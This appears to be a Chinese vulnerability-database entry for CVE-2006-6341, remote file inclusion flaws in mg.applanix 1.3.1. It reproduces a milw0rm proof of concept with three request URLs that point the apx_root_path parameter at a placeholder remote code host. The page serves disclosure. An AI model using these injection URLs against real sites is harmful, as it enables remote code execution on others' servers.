MG.Blattl MG.Applanix APX_Root_Path Parameter多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111590 漏洞类型 输入验证
发布时间 2006-11-17 更新时间 2006-12-08
CVE编号 CVE-2006-6341 CNNVD-ID CNNVD-200612-123
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2794
https://cxsecurity.com/issue/WLB-2006120044
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-123
|漏洞详情
mg.applanix1.3.1及之前版本存在多个PHP远程文件包含漏洞。远程攻击者可以借助传给(1)act/act_check_access.php,(2)dsp/dsp_form_booking_ctl.php或(3)dsp/dsp_bookings.php中的apx_root_path参数当中的URL,执行任意PHP代码。
|漏洞EXP
#########################################################################################
###################################v1per-haCker##########################################
######################How I Can lives Without FooL Programmer!###########################
#########################################################################################
#=======================================================================================#
#___________________________________mg.applanix (RFI)___________________________________#
#=======================================================================================#
# Information:-										#
#											#
# Scripts: mg.applanix									#
# download : http://freshmeat.net/redir/applanix/38915/url_zip/mg.applanix_1.3.1.zip	#
# Version : 1.3.1									#
# Dork & vuln : download script and think :)						#
#											#
#=======================================================================================#
# Exploit :										#
#											#
#http://localhost/path/act/act_check_access.php?apx_root_path=http://EvElCoDe.txt?	#
#http://localhost/path/dsp/dsp_form_booking_ctl.php?apx_root_path=http://EvElCoDe.txt?	#
#http://localhost/path/dsp/dsp_bookings.php?apx_root_path=http://EvElCoDe.txt?		#
#											#
#=======================================================================================#
# Discoverd By : v1per-haCker								#
#											#
# Conatact : v1per-hacker[at]hotmail.com						#
#											#
# XP10_hackEr Team		>>	www.xp10.com					#
# SpeciaL PoweR SecuritY TeaM	>>	www.specialpower.org				#
#											#
# Greetz to :	| abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  | 		#
#		| ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |		#
#		| metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |		#
#		| MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  | 		#
#		|  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |		#
#	    										#
# Thanks >>	/str0ke	& www.milw0rm.com & www.google.com				#
#=======================================================================================#
#########################################################################################
#################################L0ve is L1fe W0und3r####################################
#########################################################################################

# milw0rm.com [2006-11-17]
|参考资料

来源:BID
名称:21147
链接:http://www.securityfocus.com/bid/21147
来源:BUGTRAQ
名称:20061120mg.applanix<=1.3.1RemoteFileIncludeExploit
链接:http://www.securityfocus.com/archive/1/archive/1/452138/100/200/threaded
来源:XF
名称:mgapplanix-apxrootpath-file-include(30357)
链接:http://www.milw0rm.com/exploits/2794
来源:VIM
名称:20061206Sourceverifyofmg.applanixRFI
链接:http://www.attrition.org/pipermail/vim/2006-December/001164.html
来源:VIM
名称:20061206Sourceverifyofmg.applanixRFI
链接:http://www.attrition.org/pipermail/vim/2006-December/001163.html
来源:SREASON
名称:1972
链接:http://securityreason.com/securityalert/1972